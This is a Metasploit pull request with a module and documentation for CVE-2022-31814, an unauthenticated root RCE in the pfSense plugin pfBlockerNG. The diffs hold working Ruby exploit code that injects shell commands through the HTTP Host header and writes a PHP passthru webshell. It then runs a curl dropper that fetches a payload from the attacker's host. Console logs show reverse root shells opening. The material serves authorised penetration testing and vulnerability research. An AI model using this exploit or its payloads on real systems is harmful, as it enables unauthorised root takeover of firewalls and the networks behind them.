### PR TITLE
Add module for pfSense pfBlockNG unauth RCE as root - CVE-2022-31814

### DIFF
--- a/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
+++ b/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
@@ -1,0 +1,117 @@
+## Vulnerable Application
+
+### Description
+This module exploits a vulnerability in the pfSense plugin, pfBlockerNG that allows remote unauthenticated
+attackers to execute execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header.
+Versions =< 2.1.4_26 are vulnerable, note that version 3.X is unaffected.
+
+### Setup
+Download the pfSense image:
+
+`wget https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.5.2-RELEASE-amd64.iso.gz`
+
+To obtain a vulnerable copy of the pfBlockerNG plugin, you can build it from source from the [official pfSense github
+repo](https://github.com/pfsense/FreeBSD-ports/tree/devel/net/pfSense-pkg-pfBlockerNG), or it can be downloaded from
+the following link:
+
+`wget https://files01.netgate.com/pkg/pfSense_plus-v21_09_aarch64-pfSense_plus_v21_09/All/pfSense-pkg-pfBlockerNG-2.1.4_26.pkg`
+
+
+Install the .iso file in your favorite virtualizing software. Once installed pfSense will start and you can accesss the
+web GUI by navigating to `https://<pfSense-IP-address>/`
+
+Sign into the application with username: `admin` password: `pfsense`
+
+Now at the top of the screen select System -> Advanced. Scroll down to the section named Secure Shell and tick the box
+beside `Enable Secure Shell`.
+
+From your host machine we can now transfer the vulnerable package to the pfSense VM using `scp`
+
+`scp pfSense-pkg-pfBlockerNG-2.1.4_26.pkg root@<pfSense-IP-address>:/`
+
+(the root password of the VM will be the same as the admin password: `pfsense`)
+
+Install the vulnerble package with:
+`pkg install pfSense-pkg-pfBlockerNG-2.1.4_26.pkg`
+
+## Options
+
+**WEBSHELL_NAME**
+
+This is the name of the webshell that will get uploaded to the pfsense target. If left unset the file name will get
+randomly generated with a random length of either 5, 8, 11, 14 or 17 plus the file extention .php. In order to successfully
+land the webshell on the target the webshell filename needs to be of the length specified above, please keep this in
+mind when setting the webshell name.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use unix/http/pfsense_pfblockerng_webshell`
+1. Set the `RHOST`, `LHOST` options
+1. Run the module
+1. Receive a cmd shell as the root user
+
+## Scenarios
+### pfSense 2.5.2-RELEASE with pfSense-pkg-pfBlockerNG-2.1.4_26.pkg installed
+```
+msf6 > use unix/http/pfsense_pfblockerng_webshell
+[*] Using configured payload bsd/x64/shell_reverse_tcp
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set rhosts 172.16.199.131
+rhosts => 172.16.199.131
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Uploading shell...
+[*] Webshell name is: BrNGc.php
+[+] Upload succeeded, response from running id command: uid=0(root) gid=0(wheel) groups=0(wheel)
+
+[*] Executing BSD Dropper for bsd/x64/shell_reverse_tcp
+[*] Using URL: http://172.16.199.1:8080/EYFwssRWAhtL
+[*] Client 172.16.199.131 (curl/7.76.1) requested /EYFwssRWAhtL
+[*] Sending payload to 172.16.199.131 (curl/7.76.1)
+[*] Command shell session 4 opened (172.16.199.1:4444 -> 172.16.199.131:2036) at 2022-09-15 17:15:04 -0400
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Server stopped.
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+uname -a
+FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE fd0f54f44b5c(RELENG_2_5_0) pfSense  amd64
+^C
+Abort session 4? [y/N]  y
+
+[*] 172.16.199.131 - Command shell session 4 closed.  Reason: User exit
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set target 0
+target => 0
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
+
+[*] Started reverse double SSL handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Uploading shell...
+[*] Webshell name is: mTENCpIHTIl.php
+[+] Upload succeeded, response from running id command: uid=0(root) gid=0(wheel) groups=0(wheel)
+
+[*] Executing Unix Command for cmd/unix/reverse_openssl
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo kcejSRsHIm1IaTNd;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "kcejSRsHIm1IaTNd\n"
+[*] Matching...
+[*] B is input...
+[*] Command shell session 5 opened (172.16.199.1:4444 -> 172.16.199.131:51321) at 2022-09-15 17:16:07 -0400
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+uname -a
+FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE fd0f54f44b5c(RELENG_2_5_0) pfSense  amd64
+```
+

--- a/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
+++ b/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
@@ -39,9 +39,7 @@ Install the vulnerble package with:
 **WEBSHELL_NAME**
 
 This is the name of the webshell that will get uploaded to the pfsense target. If left unset the file name will get
-randomly generated with a random length of either 5, 8, 11, 14 or 17 plus the file extention .php. In order to successfully
-land the webshell on the target the webshell filename needs to be of the length specified above, please keep this in
-mind when setting the webshell name.
+randomly generated.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
+++ b/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
@@ -62,16 +62,14 @@ msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
 
 [*] Started reverse TCP handler on 172.16.199.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable.
 [*] Uploading shell...
-[*] Webshell name is: BrNGc.php
-[+] Upload succeeded, response from running id command: uid=0(root) gid=0(wheel) groups=0(wheel)
-
+[*] Webshell name is: wxhwPWwgljoabQ.php
+[+] The target is vulnerable.
 [*] Executing BSD Dropper for bsd/x64/shell_reverse_tcp
-[*] Using URL: http://172.16.199.1:8080/EYFwssRWAhtL
-[*] Client 172.16.199.131 (curl/7.76.1) requested /EYFwssRWAhtL
-[*] Sending payload to 172.16.199.131 (curl/7.76.1)
-[*] Command shell session 4 opened (172.16.199.1:4444 -> 172.16.199.131:2036) at 2022-09-15 17:15:04 -0400
+[*] Using URL: http://172.16.199.1:8080/0zFPOkdeOFLg
+[*] Client 172.16.199.130 (curl/7.76.1) requested /0zFPOkdeOFLg
+[*] Sending payload to 172.16.199.130 (curl/7.76.1)
+[*] Command shell session 3 opened (172.16.199.1:4444 -> 172.16.199.130:12257) at 2022-10-12 16:47:25 -0400
 [*] Command Stager progress - 100.00% done (117/117 bytes)
 [*] Server stopped.
 
@@ -89,23 +87,21 @@ msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
 
 [*] Started reverse double SSL handler on 172.16.199.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable.
 [*] Uploading shell...
-[*] Webshell name is: mTENCpIHTIl.php
-[+] Upload succeeded, response from running id command: uid=0(root) gid=0(wheel) groups=0(wheel)
-
+[*] Webshell name is: wuaKxVbdzGBvaxwk.php
+[+] The target is vulnerable.
 [*] Executing Unix Command for cmd/unix/reverse_openssl
 [*] Accepted the first client connection...
 [*] Accepted the second client connection...
-[*] Command: echo kcejSRsHIm1IaTNd;
+[*] Command: echo Z4vTB5j96FhnEFHo;
 [*] Writing to socket A
 [*] Writing to socket B
 [*] Reading from sockets...
-[*] Reading from socket A
-[*] A: "kcejSRsHIm1IaTNd\n"
+[*] Reading from socket B
+[*] B: "Z4vTB5j96FhnEFHo\n"
 [*] Matching...
-[*] B is input...
-[*] Command shell session 5 opened (172.16.199.1:4444 -> 172.16.199.131:51321) at 2022-09-15 17:16:07 -0400
+[*] A is input...
+[*] Command shell session 5 opened (172.16.199.1:4444 -> 172.16.199.130:57020) at 2022-10-12 16:49:01 -0400
 
 id
 uid=0(root) gid=0(wheel) groups=0(wheel)

--- a/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
+++ b/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
@@ -2,8 +2,8 @@
 
 ### Description
 This module exploits a vulnerability in the pfSense plugin, pfBlockerNG that allows remote unauthenticated
-attackers to execute execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header.
-Versions =< 2.1.4_26 are vulnerable, note that version 3.X is unaffected.
+attackers to execute execute arbitrary OS commands as root via shell meta characters in the HTTP Host header.
+Versions <= 2.1.4_26 are vulnerable. Note that version 3.x is unaffected.
 
 ### Setup
 Download the pfSense image:
@@ -16,14 +16,16 @@ the following link:
 
 `wget https://files01.netgate.com/pkg/pfSense_plus-v21_09_aarch64-pfSense_plus_v21_09/All/pfSense-pkg-pfBlockerNG-2.1.4_26.pkg`
 
+Install the .iso file in your favorite virtualizing software. You may need to use the `UEFI` or `BIOS` installation
+options to install the software correctly. For testing, `BIOS` was used. You may also need to set the WAN settings.
+For this you can just use the default or set it to `hn0` which should also be the default, and this will work fine for
+testing purposes.
 
-Install the .iso file in your favorite virtualizing software. Once installed pfSense will start and you can accesss the
-web GUI by navigating to `https://<pfSense-IP-address>/`
-
+Once installed pfSense will start and you can access the web GUI by navigating to `https://<pfSense-IP-address>/`.
 Sign into the application with username: `admin` password: `pfsense`
 
 Now at the top of the screen select System -> Advanced. Scroll down to the section named Secure Shell and tick the box
-beside `Enable Secure Shell`.
+beside `Enable Secure Shell`. Then click the `Save` button at the the bottom of the page to apply the changes.
 
 From your host machine we can now transfer the vulnerable package to the pfSense VM using `scp`
 
@@ -31,80 +33,93 @@ From your host machine we can now transfer the vulnerable package to the pfSense
 
 (the root password of the VM will be the same as the admin password: `pfsense`)
 
-Install the vulnerble package with:
-`pkg install pfSense-pkg-pfBlockerNG-2.1.4_26.pkg`
+Install the vulnerable package with: `pkg install pfSense-pkg-pfBlockerNG-2.1.4_26.pkg`
 
 ## Options
 
-**WEBSHELL_NAME**
+### WEBSHELL_NAME
 
-This is the name of the webshell that will get uploaded to the pfsense target. If left unset the file name will get
-randomly generated.
+This is the name of the webshell that will get uploaded to the pfsense target sans the ".php" ending.
+If left unset the file name will be randomly generated.
 
 ## Verification Steps
 
 1. Start msfconsole
-1. Do: `use unix/http/pfsense_pfblockerng_webshell`
-1. Set the `RHOST`, `LHOST` options
-1. Run the module
-1. Receive a cmd shell as the root user
+1. `use unix/http/pfsense_pfblockerng_webshell`
+1. Set the `RHOST` and `LHOST` options
+1. `exploit`
+1. Receive a shell as the `root` user
 
 ## Scenarios
 ### pfSense 2.5.2-RELEASE with pfSense-pkg-pfBlockerNG-2.1.4_26.pkg installed
 ```
-msf6 > use unix/http/pfsense_pfblockerng_webshell
+msf6 > use exploit/unix/http/pfsense_pfblockerng_webshell
 [*] Using configured payload bsd/x64/shell_reverse_tcp
-msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set rhosts 172.16.199.131
-rhosts => 172.16.199.131
-msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set lhost 172.16.199.1
-lhost => 172.16.199.1
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set RHOSTS 172.23.40.111
+RHOSTS => 172.23.40.111
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set LHOST 172.23.47.143
+LHOST => 172.23.47.143
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set LPORT 4453
+LPORT => 4453
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set SRVPORT 8383
+SRVPORT => 8383
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > show options
+
+Module options (exploit/unix/http/pfsense_pfblockerng_webshell):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS         172.23.40.111    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT          443              yes       The target port (TCP)
+   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
+                                              listen on all addresses.
+   SRVPORT        8383             yes       The local port to listen on.
+   SSL            true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                         no        The URI to use for this exploit (default is random)
+   VHOST                           no        HTTP server virtual host
+   WEBSHELL_NAME                   no        The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unse
+                                             t.
+
+
+Payload options (bsd/x64/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   CMD    /bin/sh          yes       The command string to execute
+   LHOST  172.23.47.143    yes       The listen address (an interface may be specified)
+   LPORT  4453             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   BSD Dropper
+
+
 msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
 
-[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Started reverse TCP handler on 172.23.47.143:4453 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Uploading shell...
-[*] Webshell name is: wxhwPWwgljoabQ.php
+[*] Webshell name is: zFOOjmPXX.php
 [+] The target is vulnerable.
 [*] Executing BSD Dropper for bsd/x64/shell_reverse_tcp
-[*] Using URL: http://172.16.199.1:8080/0zFPOkdeOFLg
-[*] Client 172.16.199.130 (curl/7.76.1) requested /0zFPOkdeOFLg
-[*] Sending payload to 172.16.199.130 (curl/7.76.1)
-[*] Command shell session 3 opened (172.16.199.1:4444 -> 172.16.199.130:12257) at 2022-10-12 16:47:25 -0400
-[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Using URL: http://172.23.47.143:8383/ITtfiF
+[*] Client 172.23.40.111 (curl/7.76.1) requested /ITtfiF
+[*] Sending payload to 172.23.40.111 (curl/7.76.1)
+[+] Deleted /usr/local/www/zFOOjmPXX.php
+[*] Command shell session 1 opened (172.23.47.143:4453 -> 172.23.40.111:30301) at 2022-10-12 19:08:21 -0500
+
+id
+[*] Command Stager progress - 100.00% done (112/112 bytes)
 [*] Server stopped.
 
-id
 uid=0(root) gid=0(wheel) groups=0(wheel)
-uname -a
-FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE fd0f54f44b5c(RELENG_2_5_0) pfSense  amd64
-^C
-Abort session 4? [y/N]  y
-
-[*] 172.16.199.131 - Command shell session 4 closed.  Reason: User exit
-msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set target 0
-target => 0
-msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
-
-[*] Started reverse double SSL handler on 172.16.199.1:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[*] Uploading shell...
-[*] Webshell name is: wuaKxVbdzGBvaxwk.php
-[+] The target is vulnerable.
-[*] Executing Unix Command for cmd/unix/reverse_openssl
-[*] Accepted the first client connection...
-[*] Accepted the second client connection...
-[*] Command: echo Z4vTB5j96FhnEFHo;
-[*] Writing to socket A
-[*] Writing to socket B
-[*] Reading from sockets...
-[*] Reading from socket B
-[*] B: "Z4vTB5j96FhnEFHo\n"
-[*] Matching...
-[*] A is input...
-[*] Command shell session 5 opened (172.16.199.1:4444 -> 172.16.199.130:57020) at 2022-10-12 16:49:01 -0400
-
-id
-uid=0(root) gid=0(wheel) groups=0(wheel)
+whoami
+root
 uname -a
 FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE fd0f54f44b5c(RELENG_2_5_0) pfSense  amd64
 ```

--- a/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
+++ b/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
@@ -122,5 +122,68 @@ whoami
 root
 uname -a
 FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE fd0f54f44b5c(RELENG_2_5_0) pfSense  amd64
+exit
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set TARGET 0
+TARGET => 0
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > show options
+
+Module options (exploit/unix/http/pfsense_pfblockerng_webshell):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS         172.23.40.111    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT          443              yes       The target port (TCP)
+   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
+                                              listen on all addresses.
+   SRVPORT        9933             yes       The local port to listen on.
+   SSL            true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                         no        The URI to use for this exploit (default is random)
+   VHOST                           no        HTTP server virtual host
+   WEBSHELL_NAME                   no        The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unse
+                                             t.
+
+
+Payload options (cmd/unix/reverse_openssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.23.47.143    yes       The listen address (an interface may be specified)
+   LPORT  4545             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
+
+[*] Started reverse double SSL handler on 172.23.47.143:4545 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Uploading shell...
+[*] Webshell name is: jIuhcpoe.php
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/reverse_openssl
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo XqZbye7zG7tGBVWc;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "XqZbye7zG7tGBVWc\n"
+[*] Matching...
+[*] A is input...
+[+] Deleted /usr/local/www/jIuhcpoe.php
+[*] Command shell session 2 opened (172.23.47.143:4545 -> 172.23.40.111:33941) at 2022-10-12 19:22:13 -0500
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+whoami
+root
 ```
 

--- a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
+++ b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
@@ -111,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"),
       'vars_post' => {
-        "#{@parameter_name}" => 'id'
+        @parameter_name.to_s => 'id'
       }
     )
     return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || check_resp.body.nil? || !check_resp.body.include?('uid=0(root) gid=0(wheel)')
@@ -127,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'
       },
       'vars_post' => {
-        "#{@parameter_name}" => cmd
+        @parameter_name.to_s => cmd
       }
     })
   end

--- a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
+++ b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
@@ -63,6 +63,10 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DefaultTarget' => 1,
         'DisclosureDate' => '2022-09-05',
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443
+        },
         'Notes' => {
           'Stability' => [ CRASH_SERVICE_DOWN ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],

--- a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
+++ b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(8..16)}.php"
     print_status("Webshell name is: #{@webshell_name}")
     web_shell_contents = <<~EOF
-      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php print(passthru( $_POST["c"]));');
+      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["c"]));');
     EOF
     encoded_php = web_shell_contents.unpack('H*')[0].upcase
     send_request_raw(

--- a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
+++ b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
 
   prepend Msf::Exploit::Remote::AutoCheck
 
@@ -18,8 +19,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'pfSense plugin pfBlockerNG unauthenticated RCE as root',
         'Description' => %q{
           pfBlockerNG is a popular pfSense plugin that is not installed by default. It’s generally used to
-          block inbound connections from whole countries or IP ranges. Versions equal to and below 2.1.4_26 are affected
-          by an unauthenticated RCE vulnerability that results in root access.
+          block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected
+          by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.
         },
         'Author' => [
           'IHTeam', # discovery
@@ -42,9 +43,6 @@ class MetasploitModule < Msf::Exploit::Remote
               'Type' => :unix_cmd,
               'DefaultOptions' => {
                 'PAYLOAD' => 'cmd/unix/reverse_openssl'
-              },
-              'Payload' => {
-                'Append' => ' & disown'
               }
             }
           ],
@@ -78,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('WEBSHELL_NAME', [
-          false, 'The name of the uploaded webshell. This value is randomly set with a specific length if unset.', nil
+          false, 'The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unset.', nil
         ])
       ]
     )
@@ -86,10 +84,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def upload_shell
     print_status 'Uploading shell...'
-    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(8..16)}.php"
+    if datastore['WEBSHELL_NAME'].blank?
+      @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"
+    else
+      @webshell_name = "#{datastore['WEBSHELL_NAME']}.php"
+    end
+    @parameter_name = Rex::Text.rand_text_alpha(4..12)
     print_status("Webshell name is: #{@webshell_name}")
     web_shell_contents = <<~EOF
-      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["c"]));');
+      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["#{@parameter_name}"]));');
     EOF
     encoded_php = web_shell_contents.unpack('H*')[0].upcase
     send_request_raw(
@@ -99,18 +102,19 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
     sleep datastore['WfsDelay']
+    register_file_for_cleanup("/usr/local/www/#{@webshell_name}")
   end
 
   def check
     upload_shell
-    check_for_shell = send_request_cgi(
+    check_resp = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"),
       'vars_post' => {
-        'c' => 'id'
+        "#{@parameter_name}" => 'id'
       }
     )
-    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_for_shell.nil? || check_for_shell.body.nil? || !check_for_shell.body.include?('uid=0(root) gid=0(wheel)')
+    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || check_resp.body.nil? || !check_resp.body.include?('uid=0(root) gid=0(wheel)')
 
     Exploit::CheckCode::Vulnerable
   end
@@ -123,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'
       },
       'vars_post' => {
-        'c' => cmd
+        "#{@parameter_name}" => cmd
       }
     })
   end

--- a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
+++ b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
@@ -1,0 +1,152 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'pfSense plugin pfBlockerNG unauthenticated RCE as root',
+        'Description' => %q{
+          pfBlockerNG is a popular pfSense plugin that is not installed by default. It’s generally used to
+          block inbound connections from whole countries or IP ranges. Versions equal to and below 2.1.4_26 are affected
+          by an unauthenticated RCE vulnerability that results in root access.
+        },
+        'Author' => [
+          'IHTeam', # discovery
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'CVE', '2022-31814' ],
+          [ 'URL', 'https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_openssl'
+              },
+              'Payload' => {
+                'Append' => ' & disown'
+              }
+            }
+          ],
+          [
+            'BSD Dropper',
+            {
+              'Platform' => 'bsd',
+              'Arch' => [ARCH_X64],
+              'Type' => :bsd_dropper,
+              'CmdStagerFlavor' => [ 'curl' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DisclosureDate' => '2022-09-05',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('WEBSHELL_NAME', [
+          false, 'The name of the uploaded webshell. This value is randomly set with a specific length if unset. The webshell filename has to be a specific length in order for the exploit to be successful, either: 5, 8, 11, 14, 17... (not including the .php exetention)  ', nil
+        ])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
+      'method' => 'GET'
+    )
+
+    return Exploit::CheckCode::Safe('Could not connect to web service - no response') if res.nil?
+    return Exploit::CheckCode::Safe("pfBlockerNG does not appear to be installed - (response code: #{res.code})") if res.code != 200
+
+    if res.body.include?('GIF') && res.headers['Content-Type'] == 'image/gif'
+      Exploit::CheckCode::Appears
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}?c=#{Rex::Text.uri_encode(cmd)}"),
+      'headers' => {
+        'Accept' => '*/*',
+        'Accept-Language' => 'en-US,en;q=0.5',
+        'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8',
+        'Connection' => 'keep-alive'
+      }
+    })
+  end
+
+  def exploit
+    print_status 'Uploading shell...'
+    # The webshell filename has to be a specific length in order for the exploit to be successful, either: 5, 8, 11, 14, 17...
+    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha([5, 8, 11, 14, 17].sample)}.php"
+
+    fail_with(Failure::BadConfig, 'WEBSHELL_NAME, is not the correct length, please the module docs for more info') unless @webshell_name.length == (9 || 12 || 15 || 18 || 21)
+
+    print_status("Webshell name is: #{@webshell_name}")
+
+    web_shell_contents = <<~EOF
+      <?$a=fopen("/usr/local/www/#{@webshell_name}","w") or die();$t='<?php print(passthru( $_GET["c"]));?>';fwrite($a,$t);fclose( $a);?>
+    EOF
+
+    send_request_raw(
+      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
+      'headers' => {
+        'Host' => "' *; echo '#{Rex::Text.encode_base64(web_shell_contents)}'|python3.8 -m base64 -d | php; '"
+      }
+    )
+
+    sleep datastore['WfsDelay']
+    check_for_shell = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}?c=id")
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Error uploading shell, the system is likely patched ') if check_for_shell.nil? || check_for_shell.body.nil?
+
+    if check_for_shell.body.include?('uid=0(root) gid=0(wheel)')
+      print_good("Upload succeeded, response from running id command: #{check_for_shell.body}")
+    else
+      fail_with(Failure::UnexpectedReply, 'Error uploading shell, the system is likely patched')
+    end
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :bsd_dropper
+      execute_cmdstager
+    end
+  end
+end

--- a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
+++ b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
@@ -98,14 +98,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    res = send_request_raw(
-      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
-      'headers' => {
-        'Host' => "' *; getmyuid | php; '"
+    upload_shell
+    check_for_shell = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"),
+      'vars_post' => {
+        'c' => 'id'
       }
     )
